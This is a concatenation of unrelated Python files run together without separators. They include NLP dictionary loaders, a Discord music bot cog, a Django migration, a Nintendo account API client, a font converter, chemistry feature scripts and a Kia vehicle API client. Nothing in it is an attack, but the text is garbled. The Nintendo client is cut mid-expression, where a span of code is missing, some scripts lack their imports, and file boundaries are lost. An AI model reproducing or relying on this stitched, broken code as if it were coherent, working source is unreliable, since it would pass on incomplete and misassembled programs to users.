pd.read_csv('../../data/sentiment/dict/posdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): posdict.append(file[0][i]) file = pd.read_csv('../../data/sentiment/dict/notdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): notdict.append(file[0][i]) file = pd.read_csv('../../data/sentiment/dict/plusdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): plusdict.append(file[0][i]) return negdict, posdict, notdict, plusdict from model import Filme, Serie, Playlist vingadores = Filme('vingadores', 2018, 160) vingadores.dar_likes() vingadores.dar_likes() atlanta = Serie('atlanta', 2018, 2) enola_holmes = Serie('', 2020, 124) enola_holmes.dar_likes() enola_holmes.dar_likes() enola_holmes.dar_likes() enola_holmes.dar_likes() lista_filmes_e_series = [vingadores, atlanta, enola_holmes] playlist = Playlist('Minha Playlist', lista_filmes_e_series) print(f'Tamanho da playlist: {len(playlist)}') for programa in playlist: print(programa) from HMM.Markovify import Markovify from nltk.corpus import brown def hmm_test(): training_corpus = brown.tagged_sents(categories='adventure', tagset='universal') model = Markovify(smoothing='max') model = model.fit(training_corpus) tagged_test = model.predict(['My', 'first', 'sentence']) print(tagged_test) if __name__ == '__main__': hmm_test() # -*- coding: utf-8 -*- """ Created on Tue Dec 22 11:52:11 2020 @author: xavier.mouy """ #import pytest import os from ecosound.core.annotation import Annotation def get_paths(): """ Define paths of the test data.""" paths = {'test_dir': os.path.dirname(os.path.realpath(__file__))} paths['data_dir'] = os.path.abspath(os.path.join(os.path.dirname( __file__ ), os.pardir, 'data')) paths['raven_annot_dir'] = os.path.join(paths['data_dir'],'Raven_annotations') paths['pamlab_annot_dir'] = os.path.join(paths['data_dir'],'PAMlab_annotations') paths['wav_files_dir'] = os.path.join(paths['data_dir'],'wav_files') # Raven annotations files raven_annot_files = [] raven_annot_files.append({'filename': '67674121.181018013806.Table.1.selections.txt', 'annot_number': 773, 'duplicates': 0}) raven_annot_files.append({'filename': 'AMAR173.4.20190916T061248Z.Table.1.selections.txt', 'annot_number': 1114, 'duplicates': 557}) paths['raven_annot_files'] = raven_annot_files return paths def test_len_is_0(): """ Test len of annot is 0 upon instantiation. """ annot = Annotation() assert len(annot) == 0 return None def test_from_raven_singlefile(fileidx=0): """ Test number of annotations when importing a single Raven file. Only use one file for this test defined by fileidx=0 """ paths = get_paths() annot = Annotation() annot.from_raven(os.path.join(paths['raven_annot_dir'],paths['raven_annot_files'][fileidx]['filename']), verbose=False) assert len(annot) == paths['raven_annot_files'][fileidx]['annot_number'] - paths['raven_annot_files'][fileidx]['duplicates'] return None def test_from_raven_singlefile_with_duplicates(fileidx=1): """ Test that Raven annotation duplicates are removed correctly. """ paths = get_paths() annot = Annotation() annot.from_raven(os.path.join(paths['raven_annot_dir'], paths['raven_annot_files'][fileidx]['filename']), verbose=False) assert len(annot) == paths['raven_annot_files'][fileidx]['annot_number'] - paths['raven_annot_files'][fileidx]['duplicates'] return None def test_from_raven_dir(): """ Test number of annotations when importing full folder (Raven). """ paths = get_paths() total_annotations = 0 for file in paths['raven_annot_files']: total_annotations += file['annot_number'] - file['duplicates'] annot = Annotation() annot.from_raven(paths['raven_annot_dir'], verbose=False) assert len(annot) == total_annotations return None # print(len(annot2)) jaddison/django-simple-socialauth # -*- coding: utf-8 -*- # Generated by Django 1.9.12 on 2017-03-06 15:58 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='SocialAccount', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('provider', models.CharField(max_length=32)), ('uid', models.CharField(max_length=256)), ('access_token', models.TextField(blank=True, default='')), ('secret', models.TextField(blank=True, default='')), ('expires', models.DateTimeField(blank=True, null=True)), ('_data', models.TextField(blank=True, default='{}', help_text='Original token response from the OAuth provider.')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='social_accounts', to=settings.AUTH_USER_MODEL)), ], ), migrations.AlterUniqueTogether( name='socialaccount', unique_together=set([('uid', 'provider')]), ), ] import datetime as dt from typing import Any, Optional, Union import discord import wavelink from discord.ext import commands from ...core import Bot from ...utils.bettercog import BetterCog from .utils import ( HZ_BANDS, LYRICS_URL, TIME_REGEX, URL_REGEX, EQGainOutOfBounds, InvalidEQPreset, InvalidRepeatMode, InvalidTimeString, MaxVolume, MinVolume, NoLyricsFound, NoMoreTracks, NonExistentEQBand, NoPreviousTracks, Player, PlayerIsAlreadyPaused, QueueIsEmpty, RepeatMode, VolumeTooHigh, VolumeTooLow, ) class Music(BetterCog, wavelink.WavelinkMixin): def __init__(self, bot: Bot): super().__init__(bot) self.wavelink = bot.wavelink_client @commands.Cog.listener() async def on_voice_state_update(self, member, before, after): if not member.bot and after.channel is None: if not [m for m in before.channel.members if not m.bot]: await self.get_player(member.guild).teardown() @wavelink.WavelinkMixin.listener() async def on_node_ready(self, node): print(f" Wavelink node `{node.identifier}` ready.") @wavelink.WavelinkMixin.listener("on_track_stuck") @wavelink.WavelinkMixin.listener("on_track_end") @wavelink.WavelinkMixin.listener("on_track_exception") async def on_player_stop(self, _: wavelink.Node, payload: Any): if payload.player.queue.repeat_mode == RepeatMode.ONE: await payload.player.repeat_track() else: await payload.player.advance() async def cog_check(self, ctx: commands.Context): if isinstance(ctx.channel, discord.DMChannel): await ctx.send("Music commands are not available in DMs.") return False return True def get_player(self, obj: Union[discord.Guild, commands.Context]): if isinstance(obj, commands.Context): return self.wavelink.get_player(obj.guild.id, cls=Player, context=obj) elif isinstance(obj, discord.Guild): return self.wavelink.get_player(obj.id, cls=Player) @commands.command(name="connect", aliases=["join"]) async def connect_command( self, ctx: commands.Context, *, channel: Optional[discord.VoiceChannel] ): player = self.get_player(ctx) channel = await player.connect(ctx, channel) await ctx.send(f"Connected to {channel.name}.") @commands.command(name="disconnect", aliases=["leave", "fuckoff"]) async def disconnect_command(self, ctx: commands.Context): player = self.get_player(ctx) await player.teardown() await ctx.send("Disconnected.") @commands.command(name="play", aliases=["p"]) async def play_command(self, ctx: commands.Context, *, query: Optional[str]): player: Player = self.get_player(ctx) if not player.is_connected: await player.connect(ctx) if query is None: if player.queue.is_empty: raise QueueIsEmpty() await player.set_pause(False) await ctx.send("Playback resumed.") else: query = query.strip("<>") if not URL_REGEX.match(query): query = f"ytsearch:{query}" await player.add_tracks(ctx, await self.wavelink.get_tracks(query)) @commands.command(name="pause") async def pause_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.is_paused: raise PlayerIsAlreadyPaused() await player.set_pause(True) await ctx.send("Playback paused.") @commands.command(name="stop") async def stop_command(self, ctx: commands.Context): player = self.get_player(ctx) player.queue.empty() await player.stop() await ctx.send("Playback stopped.") @commands.command(name="next", aliases=["skip"]) async def next_command(self, ctx: commands.Context): player = self.get_player(ctx) if not player.queue.upcoming: raise NoMoreTracks() await player.stop() await ctx.send("Playing next track in queue.") @commands.command(name="previous") async def previous_command(self, ctx: commands.Context): player = self.get_player(ctx) if not player.queue.history: raise NoPreviousTracks() player.queue.position -= 2 await player.stop() await ctx.send("Playing previous track in queue.") @commands.command(name="shuffle") async def shuffle_command(self, ctx: commands.Context): player = self.get_player(ctx) player.queue.shuffle() await ctx.send("Queue shuffled.") @commands.command(name="repeat") async def repeat_command(self, ctx: commands.Context, mode: str): if mode not in RepeatMode: raise InvalidRepeatMode() player = self.get_player(ctx) player.queue.set_repeat_mode(mode) await ctx.send(f"The repeat mode has been set to {mode}.") @commands.command(name="queue") async def queue_command(self, ctx: commands.Context, show: Optional[int] = 10): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty embed = discord.Embed( title="Queue", description=f"Showing up to next {show} tracks", colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_author(name="Query Results") embed.set_footer( text=f"Requested by {ctx.author.display_name}", icon_url=ctx.author.avatar_url, ) embed.add_field( name="Currently playing", value=getattr( player.queue.current_track, "title", "No tracks currently playing." ), inline=False, ) if upcoming := player.queue.upcoming: embed.add_field( name="Next up", value="\n".join(t.title for t in upcoming[:show]), inline=False, ) await ctx.send(embed=embed) @commands.group(name="volume", invoke_without_command=True) async def volume_group(self, ctx: commands.Context, volume: int): player = self.get_player(ctx) if volume < 0: raise VolumeTooLow() if volume > 150: raise VolumeTooHigh() await player.set_volume(volume) await ctx.send(f"Volume set to {volume:,}%") @volume_group.command(name="up") async def volume_up_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.volume == 150: raise MaxVolume() await player.set_volume(value := min(player.volume + 10, 150)) await ctx.send(f"Volume set to {value:,}%") @volume_group.command(name="down") async def volume_down_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.volume == 0: raise MinVolume() await player.set_volume(value := max(0, player.volume - 10)) await ctx.send(f"Volume set to {value:,}%") @commands.command(name="lyrics") async def lyrics_command(self, ctx: commands.Context, name: Optional[str]): player = self.get_player(ctx) name = name or player.queue.current_track.title async with ctx.typing(): async with self.bot.session.get(LYRICS_URL + name) as r: if not 200 <= r.status <= 299: raise NoLyricsFound() data = await r.json() if len(data["lyrics"]) > 2000: return await ctx.send(f"<{data['links']['genius']}>") embed = discord.Embed( title=data["title"], description=data["lyrics"], colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_thumbnail(url=data["thumbnail"]["genius"]) embed.set_author(name=data["author"]) await ctx.send(embed=embed) @commands.command(name="eq") async def eq_command(self, ctx, preset: str): player = self.get_player(ctx) eq = getattr(wavelink.eqs.Equalizer, preset, None) if not eq: raise InvalidEQPreset() await player.set_eq(eq()) await ctx.send(f"Equaliser adjusted to the {preset} preset.") @commands.command(name="adveq", aliases=["aeq"]) async def adveq_command(self, ctx, band: int, gain: float): player = self.get_player(ctx) if not 1 <= band <= 15 and band not in HZ_BANDS: raise NonExistentEQBand if band > 15: band = HZ_BANDS.index(band) + 1 if abs(gain) > 10: raise EQGainOutOfBounds player.eq_levels[band - 1] = gain / 10 eq = wavelink.eqs.Equalizer( levels=[(i, gain) for i, gain in enumerate(player.eq_levels)] ) await player.set_eq(eq) await ctx.send("Equaliser adjusted.") @commands.command(name="playing", aliases=["np"]) async def playing_command(self, ctx): player = self.get_player(ctx) if not player.is_playing: raise PlayerIsAlreadyPaused embed = discord.Embed( title="Now playing", colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_author(name="Playback Information") embed.set_footer( text=f"Requested by {ctx.author.display_name}", icon_url=ctx.author.avatar_url, ) embed.add_field( name="Track title", value=player.queue.current_track.title, inline=False ) embed.add_field( name="Artist", value=player.queue.current_track.author, inline=False ) position = divmod(player.position, 60000) length = divmod(player.queue.current_track.length, 60000) embed.add_field( name="Position", value=f"{int(position[0])}:{round(position[1]/1000):02}/{int(length[0])}:{round(length[1]/1000):02}", inline=False, ) await ctx.send(embed=embed) @commands.command(name="skipto", aliases=["playindex"]) async def skipto_command(self, ctx, index: int): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() if not 0 <= index <= player.queue.length: raise NoMoreTracks() player.queue.position = index - 2 await player.stop() await ctx.send(f"Playing track in position {index}.") @commands.command(name="restart") async def restart_command(self, ctx): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() await player.seek(0) await ctx.send("Track restarted.") @commands.command(name="seek") async def seek_command(self, ctx, position: str): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() if not (match := TIME_REGEX.match(position)): raise InvalidTimeString() if match.group(3): secs = (int(match.group(1)) * 60) + (int(match.group(3))) else: secs = int(match.group(1)) await player.seek(secs * 1000) await ctx.send("Seeked.") def setup(bot): bot.add_cog(Music(bot)) Cuyler36/NintendoClients from nintendo.miis import MiiData from bs4 import BeautifulSoup import pkg_resources import collections import requests import hashlib import base64 import struct import time import logging logger = logging.getLogger(__name__) CERT = pkg_resources.resource_filename("nintendo", "files/wiiu_common.crt") KEY = pkg_resources.resource_filename("nintendo", "files/wiiu_common.key") def calc_password_hash(pid, password): data = struct.pack("> 8) self.headers["X-Nintendo-Application-Version"] = "%04X" %application_version def get_access_token(self): if time.time() >= self.refresh_time: self.refresh_login() return self.access_token def login(self, username, password, hash=False): data = { "grant_type": "password", "user_id": username, "password": password } if hash: data["password_type"] = "hash" request = Request(self) response = request.post( "oauth20/access_token/generate", data = data ) self.access_token = response.oauth20.access_token.token.text self.refresh_token = response.oauth20.access_token.refresh_token.text self.refresh_time = time.time() + int(response.oauth20.access_token.expires_in.text) def refresh_login(self): request = Request(self) response = request.post( "oauth20/access_token/generate", data = { "grant_type": "refresh_token", "refresh_token": self.refresh_token } ) self.access_token = response.oauth20.access_token.token.text self.refresh_token = response.oauth20.access_token.refresh_token.text self.refresh_time = time.time() + int(response.oauth20.access_token.expires_in.text) def get_emails(self): request = Request(self) request.auth(self.get_access_token()) response = request.get( "people/@me/emails" ) return [Email.parse(email) for email in response.emails] def get_profile(self): request = Request(self) request.auth(self.get_access_token()) response = request.get( "people/@me/profile" ) return Profile.parse(response.person) def get_nex_token(self, game_server_id): request = Request(self) request.auth(self.get_access_token()) response = request.get( "provider/nex_token/@me", params = { "game_server_id": "%08X" %game_server_id } ) return NexToken.parse(response.nex_token) #The following functions can be used without logging in first def validate_email(self, email): request = Request(self) request.post( "support/validate/email", data = {"email": email} ) #An error is thrown if validation fails def get_miis(self, pids): request = Request(self) response = request.get( "miis", params = { "pids": ",".join([str(pid) for pid in pids]) } ) return [Mii.parse(mii) for mii in response.miis] def get_mii(self, pid): return self.get_miis([pid])[0] def get_pids(self, nnids): request = Request(self) response = request.get( "admin/mapped_ids", params = { "input_type": "user_id", "output_type": "pid", "input": ",".join(nnids) } ) return {id.in_id.text: int(id.out_id.text) for id in response.mapped_ids} def get_nnids(self, pids): request = Request(self) response = request.get( "admin/mapped_ids", params = { "input_type": "pid", "output_type": "user_id", "input": ",".join([str(pid) for pid in pids]) } ) return {int(id.in_id.text): id.out_id.text for id in response.mapped_ids} def get_pid(self, nnid): return self.get_pids([nnid])[nnid] def get_nnid(self, pid): return self.get_nnids([pid])[pid] def get_time_zones(self, country, language): request = Request(self) response = request.get( "content/time_zones/%s/%s" %(country, language) ) return [TimeZone.parse(tz) for tz in response.timezones] #!/usr/bin/env python # # Copyright (c) 2014 Nutanix, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # Converts a BDF bitmap font to C header file so it can be embedded into C # programs. # # Usage: # # bdf_to_c.py < in.bdf > out.h # import sys fontmap = {} cur_char = None in_bitmap = False font_width = None font_height = None for line in sys.stdin: parts = line.split() if cur_char is None and parts[0] == "FONTBOUNDINGBOX": font_width = int(parts[1]) font_height = int(parts[2]) if font_width <= 8: font_bit_width = 8 elif font_width <= 16: font_bit_width = 16 elif font_width <= 32: font_bit_width = 32 else: assert False, "Font too wide" if cur_char is None and parts[0] == "ENCODING": cur_char = [] fontmap[int(parts[1])] = cur_char elif cur_char is not None and parts[0] == "BITMAP": in_bitmap = True elif in_bitmap and parts[0] == "ENDCHAR": cur_char = None in_bitmap = False elif in_bitmap: cur_char.append(int(parts[0], 16)) sys.stdout.write("#define FONT_X_RES %d\n" % font_width) sys.stdout.write("#define FONT_Y_RES %d\n" % font_height) sys.stdout.write("static const u%d FONT_BITMAP[][%d] = {\n" % (font_bit_width, font_height)) def bit_flip(x): r = 0 for _ in xrange(font_bit_width): r = (r << 1) | (x & 1) x >>= 1 return r for x in xrange(128): bitmap = fontmap.get(x, []) sys.stdout.write(" /* code point %x */\n" % x) sys.stdout.write(" {\n") for row in bitmap: sys.stdout.write(" 0x%x,\n" % bit_flip(row)) sys.stdout.write(" },\n") sys.stdout.write("};\n") from .decorators import decoratormethod class HTTPMethodsMixIn(): """convenience methods for .route()""" @decoratormethod def get(self, *args, **kwargs): return self.route(*args, methods=['GET'], **kwargs) @decoratormethod def post(self, *args, **kwargs): return self.route(*args, methods=['POST'], **kwargs) @decoratormethod def put(self, *args, **kwargs): return self.route(*args, methods=['PUT'], **kwargs) @decoratormethod def delete(self, *args, **kwargs): return self.route(*args, methods=['DELETE'], **kwargs) @decoratormethod def patch(self, *args, **kwargs): return self.route(*args, methods=['PATCH'], **kwargs) @decoratormethod def options(self, *args, **kwargs): return self.route(*args, methods=['OPTIONS'], **kwargs) class RESTFulRoutesMixIn(HTTPMethodsMixIn): """convenience methods for .route() https://medium.com/@shubhangirajagrawal/the-7-restful-routes-a8e84201f206 https://gist.github.com/alexpchin/09939db6f81d654af06b """ resource_id = '' @decoratormethod def index(self, endpoint, *paths, **kwargs): "display a list of this resource" return self.get(endpoint, *paths or [''], **kwargs) @decoratormethod def new(self, endpoint, *paths, **kwargs): "show a form to create this resource" for path in paths or ['']: self.get(endpoint, f'new{path}', **kwargs) return endpoint @decoratormethod def create(self, endpoint, *paths, **kwargs): "add a new resource to database, then redirect" return self.post(endpoint, *paths or [''], **kwargs) @decoratormethod def show(self, endpoint, *paths, **kwargs): "show info about one resource" for path in paths or ['']: self.get(endpoint, f'/{self.resource_id}{path}', **kwargs) return endpoint @decoratormethod def edit(self, endpoint, *paths, **kwargs): "show a form to edit one resource" for path in paths or ['']: self.get(endpoint, f'/{self.resource_id}/edit{path}', **kwargs) return endpoint @decoratormethod def update(self, endpoint, *paths, **kwargs): "update a particular resource, then redirect" for path in paths or ['']: self.route(endpoint, f'/{self.resource_id}{path}', methods=['PATCH', 'PUT'], **kwargs) return endpoint @decoratormethod def destroy(self, endpoint, *paths, **kwargs): "delete a particular resource, then redirect" for path in paths or ['']: self.delete(endpoint, f'/{self.resource_id}{path}', **kwargs) return endpoint sergicollado/json_redo0 class BadParametersError(Exception): def __init__(self, class_name: str, required_params: list, data: dict): self.message = f'{class_name} params: {" - ".join(required_params)} not found, data: {data}' super().__init__(self.message) def __str__(self): return self.message 0 import pyactus def test_version_of_library(): assert pyactus.__version__ == "0.0.0" 1-10 # coding: utf-8 ''' This function read_struct_get_ewald(df,df_name) reads structure file where df=train/test and output Ewald energies. ''' class Atom: # Equality epsilon ee = 1e-6 def __init__(self, x=0.0, y=0.0, z=0.0, t="", c=0): self.x = x self.y = y self.z = z self.t = t self.c = c def read_geometry_file(path_to_file): with open(path_to_file) as f: lines = f.readlines() vec_x = lines[3].split() vec_y = lines[4].split() vec_z = lines[5].split() vec_x = [float(vec_x[i]) for i in range(1, len(vec_x))] vec_y = [float(vec_y[i]) for i in range(1, len(vec_y))] vec_z = [float(vec_z[i]) for i in range(1, len(vec_z))] ga_charge = periodic_table.Element['Ga'].Z # 31.0 al_charge = periodic_table.Element['Al'].Z # 13.0 in_charge = periodic_table.Element['In'].Z # 49.0 o_charge = periodic_table.Element['O'].Z # 8.0 vectors = [vec_x, vec_y, vec_z] uc_atoms = [] for i in range(6, len(lines)): sl = lines[i].split() x = float(sl[1]) y = float(sl[2]) z = float(sl[3]) t = sl[4] if sl[4] == "Ga": c = ga_charge elif sl[4] == "Al": c = al_charge elif sl[4] == "In": c = in_charge elif sl[4] == "O": c = o_charge a = Atom(x, y, z, t, c) uc_atoms.append(a) return vectors, uc_atoms def convert_uc_atoms_to_input_for_pymatgen(uc_atoms): n = len(uc_atoms) atom_coords = [] atom_labels = [] charge_list = [] for i in range(n): x = uc_atoms[i].x y = uc_atoms[i].y z = uc_atoms[i].z t = uc_atoms[i].t c = uc_atoms[i].c vec = [x, y, z] atom_coords.append(vec) atom_labels.append(t) charge_list.append(c) site_properties = {"charge": charge_list} return atom_coords, atom_labels, site_properties def read_struct_get_ewald(df,df_name): r_ene = [] k_ene = [] p_ene = [] eta = [] for i in range(len(df)): filename = str(str(df_name)+'/'+str(i+1)+'/geometry.xyz') vectors, uc_atoms = read_geometry_file(filename) atom_coords, atom_labels, site_properties = convert_uc_atoms_to_input_for_pymatgen(uc_atoms) lattice = Lattice.from_parameters(a=df.lattice_vector_1_ang[i], b=df.lattice_vector_2_ang[i], c=df.lattice_vector_3_ang[i], alpha=df.lattice_angle_alpha_degree[i], beta=df.lattice_angle_beta_degree[i], gamma=df.lattice_angle_gamma_degree[i]) structure = Structure(lattice, atom_labels, atom_coords, site_properties=site_properties) ewald_sum = ewald.EwaldSummation(structure) r_ene.append(ewald_sum.real_space_energy) k_ene.append(ewald_sum.reciprocal_space_energy) p_ene.append(ewald_sum.point_energy) eta.append(ewald_sum.eta) df['r_ene'] = pd.DataFrame(r_ene) df['k_ene'] = pd.DataFrame(k_ene) df['p_ene'] = pd.DataFrame(p_ene) df['eta'] = pd.DataFrame(eta) return df['r_ene'], df['k_ene'], df['p_ene'], df['eta'] import os import argparse import numpy as np import pandas as pd from tqdm import tqdm from rdkit.Chem import AllChem from ogb.graphproppred import GraphPropPredDataset def getmorganfingerprint(mol): return list(AllChem.GetMorganFingerprintAsBitVect(mol, 2)) def getmaccsfingerprint(mol): fp = AllChem.GetMACCSKeysFingerprint(mol) return [int(b) for b in fp.ToBitString()] def main(dataset_name): dataset = GraphPropPredDataset(name=dataset_name) df_smi = pd.read_csv(f"dataset/{dataset_name}/mapping/mol.csv.gz".replace("-", "_")) smiles = df_smi["smiles"] mgf_feat_list = [] maccs_feat_list = [] for ii in tqdm(range(len(smiles))): rdkit_mol = AllChem.MolFromSmiles(smiles.iloc[ii]) mgf = getmorganfingerprint(rdkit_mol) mgf_feat_list.append(mgf) maccs = getmaccsfingerprint(rdkit_mol) maccs_feat_list.append(maccs) mgf_feat = np.array(mgf_feat_list, dtype="int64") maccs_feat = np.array(maccs_feat_list, dtype="int64") print("morgan feature shape: ", mgf_feat.shape) print("maccs feature shape: ", maccs_feat.shape) save_path = f"./dataset/{dataset_name}".replace("-", "_") print("saving feature in %s" % save_path) np.save(os.path.join(save_path, "mgf_feat.npy"), mgf_feat) np.save(os.path.join(save_path, "maccs_feat.npy"), maccs_feat) if __name__=="__main__": parser = argparse.ArgumentParser(description='gnn') parser.add_argument("--dataset_name", type=str, default="ogbg-molhiv") args = parser.parse_args() main(args.dataset_name)hyundai_kia_connect_api/KiaUvoAPIUSA.py0 import logging import random import secrets import string import time from datetime import datetime, timedelta import datetime as dt import re import pytz import requests from requests import RequestException, Response from .const import DOMAIN, VEHICLE_LOCK_ACTION, TEMPERATURE_UNITS, DISTANCE_UNITS from .ApiImpl import ApiImpl, ClimateRequestOptions from .Token import Token from .Vehicle import Vehicle from .utils import get_child_value _LOGGER = logging.getLogger(__name__) class AuthError(RequestException): pass def request_with_active_session(func): def request_with_active_session_wrapper(*args, **kwargs): try: return func(*args, **kwargs) except AuthError: _LOGGER.debug(f"got invalid session, attempting to repair and resend") self = args[0] token = kwargs["token"] vehicle = kwargs["vehicle"] new_token = self.login(token.username, token.password) _LOGGER.debug( f"old token:{token.access_token}, new token:{new_token.access_token}" ) token.access_token = new_token.access_token token.valid_until = new_token.valid_until json_body = kwargs.get("json_body", None) if json_body is not None and json_body.get("vinKey", None): json_body["vinKey"] = [vehicle.key] response = func(*args, **kwargs) return response return request_with_active_session_wrapper def request_with_logging(func): def request_with_logging_wrapper(*args, **kwargs): url = kwargs["url"] json_body = kwargs.get("json_body") if json_body is not None: _LOGGER.debug(f"sending {url} request with {json_body}") else: _LOGGER.debug(f"sending {url} request") response = func(*args, **kwargs) _LOGGER.debug(f"got response {response.text}") response_json = response.json() if response_json["status"]["statusCode"] == 0: return response if ( response_json["status"]["statusCode"] == 1 and response_json["status"]["errorType"] == 1 and response_json["status"]["errorCode"] == 1003 ): _LOGGER.debug(f"error: session invalid") raise AuthError _LOGGER.error(f"error: unknown error response {response.text}") raise RequestException return request_with_logging_wrapper class KiaUvoAPIUSA(ApiImpl): def __init__( self, region: int, brand: int, ) -> None: self.temperature_range = range(62, 82) # Randomly generate a plausible device id on startup self.device_id = ( "".join( random.choice(string.ascii_letters + string.digits) for _ in range(22) ) + ":" + secrets.token_urlsafe(105) ) self.BASE_URL: str = "api.owners.kia.com" self.API_URL: str = "https://" + self.BASE_URL + "/apigw/v1/" def api_headers(self) -> dict: offset = time.localtime().tm_gmtoff / 60 / 60 headers = { "content-type": "application/json;charset=UTF-8", "accept": "application/json, text/plain, */*", "accept-encoding": "gzip, deflate, br", "accept-language": "en-US,en;q=0.9", "apptype": "L", "appversion": "4.10.0", "clientid": "MWAMOBILE", "from": "SPA", "host": self.BASE_URL, "language": "0", "offset": str(int(offset)), "ostype": "Android", "osversion": "11", "secretkey": "", "to": "APIGW", "tokentype": "G", "user-agent": "okhttp/3.12.1", } # should produce something like "Mon, 18 Oct 2021 07:06:26 GMT". May require adjusting locale to en_US date = datetime.now(tz=pytz.utc).strftime("%a, %d %b %Y %H:%M:%S GMT") headers["date"] = date headers["deviceid"] = self.device_id return headers def authed_api_headers(self, token: Token, vehicle: Vehicle): headers = self.api_headers() headers["sid"] = token.access_token headers["vinkey"] = vehicle.key return headers @request_with_active_session @request_with_logging def post_request_with_logging_and_active_session( self, token: Token, url: str, json_body: dict, vehicle: Vehicle ) -> Response: headers = self.authed_api_headers(token, vehicle) return requests.post(url, json=json_body, headers=headers) @request_with_active_session @request_with_logging def get_request_with_logging_and_active_session( self, token: Token, url: str, vehicle: Vehicle ) -> Response: headers = self.authed_api_headers(token, vehicle) return requests.get(url, headers=headers) def login(self, username: str, password: str) -> Token: """Login into cloud endpoints and return Token""" url = self.API_URL + "prof/authUser" data = { "deviceKey": "", "deviceType": 2, "userCredential": {"userId": username, "password": password}, } headers = self.api_headers() response = requests.post(url, json=data, headers=headers) _LOGGER.debug(f"{DOMAIN} - Sign In Response {response.text}") session_id = response.headers.get("sid") if not session_id: raise Exception( f"no session id returned in login. Response: {response.text} headers {response.headers} cookies {response.cookies}" ) _LOGGER.debug(f"got session id {session_id}") valid_until = dt.datetime.now(pytz.utc) + dt.timedelta(hours=1) return Token( username=username, password=password, access_token=session_id, valid_until=valid_until, ) def get_vehicles(self, token: Token) -> list[Vehicle]: """Return all Vehicle instances for a given Token""" url = self.API_URL + "ownr/gvl" headers = self.api_headers() headers["sid"] = token.access_token response = requests.get(url, headers=headers) _LOGGER.debug(f"{DOMAIN} - Get Vehicles Response {response.text}") response = response.json() result = [] for entry in response["payload"]["vehicleSummary"]: vehicle: Vehicle = Vehicle( id=entry["vehicleIdentifier"], name=entry["nickName"], model=entry["modelName"], key=entry["vehicleKey"], ) result.append(vehicle) return result def refresh_vehicles(self, token: Token, vehicles: list[Vehicle]) -> None: """Refresh the vehicle data provided in get_vehicles. Required for Kia USA as key is session specific""" url = self.API_URL + "ownr/gvl" headers = self.api_headers() headers["sid"] = token.access_token response = requests.get(url, headers=headers) _LOGGER.debug(f"{DOMAIN} - Get Vehicles Response {response.text}") response = response.json() for entry in response["payload"]["vehicleSummary"]: if vehicles[entry["vehicleIdentifier"]]: vehicles[entry["vehicleIdentifier"]].name=entry["nickName"] vehicles[entry["vehicleIdentifier"]].model=entry["modelName"] vehicles[entry["vehicleIdentifier"]].key=entry["vehicleKey"] else: vehicle: Vehicle = Vehicle( id=entry["vehicleIdentifier"], name=entry["nickName"], model=entry["modelName"], key=entry["vehicleKey"], ) vehicles.append(vehicle) def update_vehicle_with_cached_state(self, token: Token, vehicle: Vehicle) -> None: """Get cached vehicle data and update Vehicle instance with it""" state = self._get_cached_vehicle_state(token, vehicle) vehicle.last_updated_at = self.get_last_updated_at( get_child_value(state, "vehicleStatus.syncDate.utc") ) vehicle.total_driving_distance = ( get_child_value( state, "vehicleStatus.evStatus.drvDistance.0.rangeByFuel.totalAvailableRange.value", ), DISTANCE_UNITS[3], ) vehicle.odometer = ( get_child_value(state, "odometer.value"), DISTANCE_UNITS[3], ) vehicle.next_service_distance = ( get_child_value(state, "service.imatServiceOdometer"), DISTANCE_UNITS[3], ) vehicle.last_service_distance = ( get_child_value(state, "service.msopServiceOdometer"), DISTANCE_UNITS[3], ) vehicle.car_battery_percentage = get_child_value( state, "vehicleStatus.batteryStatus.stateOfCharge" ) vehicle.engine_is_running = get_child_value(state, "vehicleStatus.engine") vehicle.air_temperature = ( get_child_value(state, "vehicleStatus.airTemp.value"), TEMPERATURE_UNITS[1], ) vehicle.defrost_is_on = get_child_value(state, "vehicleStatus.defrost") vehicle.washer_fluid_warning_is_on = get_child_value(state, "vehicleStatus.washerFluidStatus") vehicle.smart_key_battery_warning_is_on = get_child_value(state, "vehicleStatus.smartKeyBatteryWarning") vehicle.tire_pressure_all_warning_is_on = get_child_value(state, "vehicleStatus.tirePressure.all") vehicle.steering_wheel_heater_is_on = get_child_value( state, "vehicleStatus.steerWheelHeat" ) vehicle.back_window_heater_is_on = get_child_value( state, "vehicleStatus.sideBackWindowHeat" ) vehicle.side_mirror_heater_is_on = get_child_value( state, "vehicleStatus.sideMirrorHeat" ) vehicle.front_left_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.flSeatHeatState" ) 